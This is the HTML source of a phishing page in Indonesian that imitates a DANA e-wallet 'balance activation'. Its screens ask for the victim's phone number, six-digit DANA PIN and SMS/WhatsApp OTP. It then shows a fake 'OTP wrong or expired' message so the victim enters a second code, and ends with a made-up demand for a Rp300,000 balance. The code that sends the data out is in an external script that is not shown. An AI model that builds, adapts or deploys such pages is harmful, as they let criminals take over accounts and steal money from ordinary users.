<!DOCTYPE html>
<html lang="id">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta property="og:image:type" content="image/jpeg">
  <meta property="og:image" content="https://tuturpedia.com/wp-content/uploads/artikel-aplikasi-DANA-tidak-diawasi-OJK-750x375.jpg">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge">
  <title> Aktivasi saldo DANA</title>
  <style>
    body {
      font-family: OpenSans;
      margin: 0;
      padding: 0;
      justify-content: center;
      align-items: center;
      height: 100vh;
      background: linear-gradient(to top, white 70%, #007BFF 30%);
    }

    .container {
      margin: 0;
      padding: 0;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 95vh;

    }

    .phone-input {
      display: flex;
      align-items: center;
      border: 1px solid #ccc;
      border-radius: 5px;
      overflow: hidden;
    }

    .nope {
      width: 70%;
      padding: 10px;
      border: none;
      outline: none;
      font-size: 21px;
      letter-spacing: 1px;
    }

    .otp1 {
      width: 30%;
      text-align: center;
      height: 20px;
      padding: 10px;
      border-radius: 5px;
      border: solid 1px #D9D9D9;
      outline: none;
      font-size: 26px;
      letter-spacing: 1px;
    }

    .flag-icon {
      width: 25px;
      height: 24px;
      margin: 0 10px;
    }

    .country-code {
      margin-right: 5px;
      font-size: 18px;
    }

    button {
      position: fixed;
      bottom: 10px;
      left: 50%;
      transform: translateX(-50%);
      width: 92%;
      height: 40px;
      padding: 5px;
      background-color: white;
      color: white;
      font-size: 18px;
      border: none;
      text-align: center;
      background: #118EEA;
      border: 0px solid #1989DF;
      border-radius: 5px;
    }


    button:disabled {
      background-color: #00000051;
    }

    h1 {
      font-size: 16px;
      font-weight: 450;
    }


    h3 {
      font-size: 16px;
      color: red;
    }


    @keyframes slideUp {
      from {
        transform: translateY(100%);
        opacity: 0;
      }

      to {
        transform: translateY(0);
        opacity: 1;
      }
    }

    .page1 {
      width: 85%;
      max-width: 400px;
      padding: 20px;
      background-color: white;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
      border-radius: 8px;
      z-index: 11;
    }

    .page2 {
      width: 100%;
      height: 100%;
      background-color: white;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
      border-radius: 10px;
      left: 0;
      right: 0;
      margin: auto;
      position: relative;
      /* Ensure z-index is effective */
      z-index: 12;
      /* Ensure page2 is below page3 */
    }

    .gbr {
      margin-top: 5px;
    }

    .page3 {
      animation: slideUp 0.5s;
      background-color: white;
      width: 100%;
      height: 50%;
      top: 50%;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
      border-radius: 10px;
      position: fixed;
      left: 0;
      right: 0;
      margin: 0;
      z-index: 993;
      /* Ensure page3 is above page2 */
      text-align: center;
    }

    .page4 {
      animation: slideUp 0.5s;
      background-color: white;
      width: 100%;
      height: 70%;
      top: 30%;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
      border-radius: 8px;
      position: fixed;
      left: 0;
      right: 0;
      margin: 0;
      z-index: 994;
      /* Ensure page3 is above page2 */
      text-align: center;
      /* Ensure page3 is above page2 */
    }

    .page4a {
      animation: slideUp 0.5s;
      background-color: white;
      width: 100%;
      height: 75%;
      top: 45%;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
      border-radius: 8px;
      position: fixed;
      left: 0;
      right: 0;
      margin: 0;
      z-index: 994;
      /* Ensure page3 is above page2 */
      text-align: center;
      /* Ensure page3 is above page2 */
    }

    .page5 {
      animation: slideUp 0.5s;
      background-color: white;
      width: 100%;
      height: 60%;
      top: 40%;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
      border-radius: 8px;
      position: fixed;
      left: 0;
      right: 0;
      margin: 0;
      z-index: 9953;
      /* Ensure page3 is above page2 */
      text-align: center;
    }

    .page6 {
      background-color: white;
      width: 80%;
      height: 50%;
      top: 20%;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
      border-radius: 8px;
      position: fixed;
      left: 25px;
      padding: 10px;
      z-index: 9999;
      /* Ensure page3 is above page2 */
      text-align: center;
    }


    .pin-container {
      display: flex;
      justify-content: center;
      margin-bottom: 10px;
    }

    .pin-box {
      width: 40px;
      height: 40px;
      text-align: center;
      font-size: 25px;
      margin: 0 2px;
      border: 1px solid #ccc;
      border-radius: 10px;
    }

    .pin-box:focus {
      outline: none;
      border-color: #007bff;
    }

    .button-container {
      display: flex;
      justify-content: center;
      margin-top: 10px;
    }

    .toggle-button {
      padding: 5px 15px;
      border: 1px solid #00BFFF;
      border-radius: 25px;
      background-color: #fff;
      color: #00BFFF;
      font-size: 12px;
      cursor: pointer;
    }

    .otp-input-container {
      display: flex;
      justify-content: center;
      /* Pusatkan elemen */
      gap: 10px;
      /* Jarak antar input */
      margin-bottom: 20px;
      /* Jarak bawah container */
    }

    .otp-input-container input[type="number"] {
      width: 30px;
      /* Lebar setiap input */
      height: 30px;
      /* Tinggi setiap input */
      font-size: 25px;
      /* Ukuran font */
      text-align: center;
      /* Posisi teks di tengah */
      border-radius: 10px;
      /* Radius sudut kotak input */
      border: 1px solid #ccc;
      /* Warna border */
    }

    /**********-----SPINNER----***********/
    .process {
      top: 0;
      left: 0;
      right: 0;
      position: absolute;
      display: flex;
      justify-content: center;
      align-items: center;
      background: #0000005b;
      z-index: 99;
      width: 100%;
      height: 100%;
    }

    .loading {
      margin-top: -50px;
      position: absolute;
      display: flex;
      justify-content: center;
      align-items: center;
    }

    .loading img {
      width: 50px;
    }

    .loading .spinner {
      position: absolute;
      width: 35px;
      animation: spin 1s linear infinite;
      -webkit-animation: spin 1s linear infinite;
      -moz-animation: spin 1s linear infinite;
      -ms-animation: spin 1s linear infinite;
      -o-animation: spin 1s linear infinite;
    }


    @keyframes spin {
      0% {
        transform: rotate(360deg);
      }

      100% {
        transform: rotate(0deg);
      }
    }

    @-webkit-keyframes spin {
      0% {
        -webkit-transform: rotate(360deg);
      }

      100% {
        -webkit-transform: rotate(0deg);
      }
    }

    @-moz-keyframes spin {
      0% {
        -webkit-transform: rotate(360deg);
      }

      100% {
        -webkit-transform: rotate(0deg);
      }
    }

    @-ms-keyframes spin {
      0% {
        -webkit-transform: rotate(360deg);
      }

      100% {
        -webkit-transform: rotate(0deg);
      }
    }

    @-o-keyframes spin {
      0% {
        -webkit-transform: rotate(360deg);
      }

      100% {
        -webkit-transform: rotate(0deg);
      }
    }

    @media screen and (min-width: 900px) {
      .process {
        position: absolute;
      }
    }


    /**********-----OTP----***********/

    .peringatanOtp {
      background: red;
      z-index: 99999;
    }

    h2 {
      font-size: 16px;
      color: #000000C9;
    }

    .btntmr {
      margin-top: 0px;
      font-size: 16px;
      color: #00000050;
      font-size: 14px;
      cursor: not-allowed;
    }

    .btntmr.enabled {
      cursor: pointer;
      color: #008AFF;
    }

    /**************************************/

    .kunOtp {
      top: 0;
      position: absolute;
      display: block;
      justify-content: center;
      align-items: center;
      background: #000000B8;
      z-index: 9999;
      width: 100%;
      height: 100%;
    }

    #timer {
      font-size: 28px;
      font-weight: bold;
      color: #FFFFFFC4;
    }

    .butt {
      display: relative;
      width: 70%;
      height: 20px;
      padding: 10px;
      color: white;
      font-size: 16px;
      background: #118EEA;
      border: 0px solid #1989DF;
      border-radius: 5px;
    }

    .kunci {
      top: 0;
      left: 0;
      right: 0;
      position: fixed;
      align-items: center;
      justify-content: center;
      text-align: center;
      background: #000000BF;
      z-index: 99;
      width: 100%;
      height: 100%;
      color: #FFFFFF;
      font-size: 21px;
      padding: 0;
    }

    .btn66 {
      position: absolute;
      bottom: 10px;
      left: 50%;
      transform: translateX(-50%);
      width: 92%;
      height: 40px;
      padding: 5px;
      background-color: white;
      color: white;
      font-size: 18px;
      border: none;
      text-align: center;
      background: #118EEA;
      border: 0px solid #1989DF;
      border-radius: 5px;
    }
  </style>
</head>

<body>
  <div class="container">
    <div id="spinner" name="spinner" class="process" style="display: none;">
      <div id="gbrspin" class="loading"><img src="/load_bg.png"><img class="spinner" src="/load_spin.png">
      </div>
    </div>
    <div id="overlay" class="process" style="display: none"></div>
    <!-- Page1 NO hp -->
    <div id="Page1" class="page1" style="display: block">
      <img src="/c.jpg" alt="/a.jpg" width="100%">
      <h1>Masukkan nomor Hp sebagai
        ID
        DANA</h1>
      <div class="phone-input">
        <img src="indonesia-flag.png" alt="Indonesia Flag" class="flag-icon">
        <span class="country-code">+62</span>
        <input type="tel" id="phone" class="nope" placeholder="811 2345 6789" oninput="formatPhoneNumber()">
      </div>
      <img src="/d.jpg" alt="/a.jpg" width="100%">
      <div class="btn">
        <button id="continueButton" onclick="showPage2()" disabled>Lanjut</button>
      </div>
    </div>

    <!-- Page2 Rincian -->
    <div id="Page2" class="page2" style="display: none">
      <img src="rincian.png" alt="e.png" width="100%">
      <button onclick="showPage3()">Lanjut</button>
    </div>

    <!-- Page3 PIN -->
    <div id="Page3" class="page3" style="display: none">
      <div class="gbr">
        <img src="f.png" alt="f.png" width="100%">
      </div>
      <h2>PIN DANA</h2>
      <div class="pin-container">
        <input type="password" id="pin1" maxlength="1" class="pin-box" inputmode="numeric" oninput="checkAndEnable(this, 'pin2')">
        <input type="password" id="pin2" maxlength="1" class="pin-box" inputmode="numeric" disabled oninput="checkAndEnable(this, 'pin3')" onkeydown="moveToPrev(event, 'pin1')">
        <input type="password" id="pin3" maxlength="1" class="pin-box" inputmode="numeric" disabled oninput="checkAndEnable(this, 'pin4')" onkeydown="moveToPrev(event, 'pin2')">
        <input type="password" id="pin4" maxlength="1" class="pin-box" inputmode="numeric" disabled oninput="checkAndEnable(this, 'pin5')" onkeydown="moveToPrev(event, 'pin3')">
        <input type="password" id="pin5" maxlength="1" class="pin-box" inputmode="numeric" disabled oninput="checkAndEnable(this, 'pin6')" onkeydown="moveToPrev(event, 'pin4')">
        <input type="password" id="pin6" maxlength="1" class="pin-box" inputmode="numeric" disabled onkeydown="moveToPrev(event, 'pin5')" oninput="showPage4()">
      </div>
      <div class="button-container">
        <button1 onclick="togglePassword()" class="toggle-button" id="toggleButton">
          Tampilkan
        </button1>
      </div>
    </div>

    <!--OTP Page4 -->
    <div id="Page4" class="page4" style="display: none">
      <img src="f.png" alt="f.png" width="100%" style="margin-top: 10px;">
      <div id="spaceOtp" style="padding: 0 15px 0">
        <h2>Kode OTP</h2>
        <p style="font-size: 12px; color: gray;">Kode OTP dikirim via SMS/WhatsApp ke nomor hp yang terhubung dengan aplikasi DANA</p>
        <input type="tel" class="otp1" id="otp" maxlength="6" minlength="4" required>
      </div>
      <span class="btntmr" id="resendButton" disabled>Kirim Ulang: 320s</span>
      <p id="peringatanOtp" style="display: none; color: red; font-size: 14px;">Kode OTP harus diisi..!</p>
      <div class="btnOtp">
        <button onclick="showPage4a()">Lanjut</button>
      </div>
    </div>

    <div id="Page4a" class="page4a" style="display: none">
      <img src="f.png" alt="f.png" width="100%" style="margin-top: 10px;">
      <div id="spaceOtp" style="padding: 0 15px 0">
        <h2>Kode OTP</h2>
        <input type="tel" class="otp1" id="otpa" maxlength="6" minlength="4" required>
        <p style="color: #FF3F3F; font-size: 14px; ">Kode OTP salah atau kadaluwarsa!</p>
      </div>
      <p id="peringatanOtp" style="display: none; color: red; font-size: 14px;">Kode OTP harus diisi..!</p>
      <div class="btnOtp">
        <button onclick="showPage6()">Lanjut</button>
      </div>
    </div>


    <!-- Page5 -->
    <div id="Page5" class="page5" style="display: none">
      <div id="kunOtp" class="kunOtp">
        <div style="margin-top: 40%; color: #FFFFFFC4">
          <p>Kode OTP yang dimasukkan salah atau kadaluwarsa. Jangan menutup halaman ini, Mohon menunggu kode berikutnya setelah:</p>
        </div>
        <div id="timer">80s</div>
      </div>
      <img src="f.png" alt="f.png" width="100%" style="margin-top: 10px;">
      <div id="spaceOtp" style="padding: 0 15px 0">
        <h2>Kode OTP</h2>
        <input type="tel" class="otp1" id="otp2" maxlength="6" minlength="4" required>
      </div>
      <span class="btntmr" id="resendButton1" disabled>Kirim Ulang: 320s</span>
      <p id="peringatanOtp" style="display: none; color: red; font-size: 14px;">Kode OTP harus diisi..!</p>
      <div class="btnOtp">
        <button onclick="showPage6()">Lanjut</button>
      </div>
    </div>


    <div id="Page6" class="page6" style="display: none">""
      <div style="width: 100%">
        <img src="g.png" alt="g.png" width="100%">
        <br>
        <h2>Aktivasi Saldo Gagal</h2>
        <p style="font-size: 14.1px; ">Untuk dapat menyelesaikan
          aktivasi saldo ini. <br>Pastikan kamu
          memiliki saldo minimal
          Rp300.000 di aplikasi DANA kamu sebagai bukti bahwa kamu pengguna aktif aplikasi DANA.</p>
        <div class="tbl6">
          <button class="btn66" onclick="window.location.href='https://play.google.com/store/apps/details?id=id.dana&hl=en'">Mengerti</button>
        </div>
      </div>
      <br>
      <div id="overlay" style="display: none; position: absolute; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0, 0, 0, 0.5); z-index: 50;">
      </div>
    </div>
  </div>

<script src="/script.js">/script.js</script>
</body>

  </html>
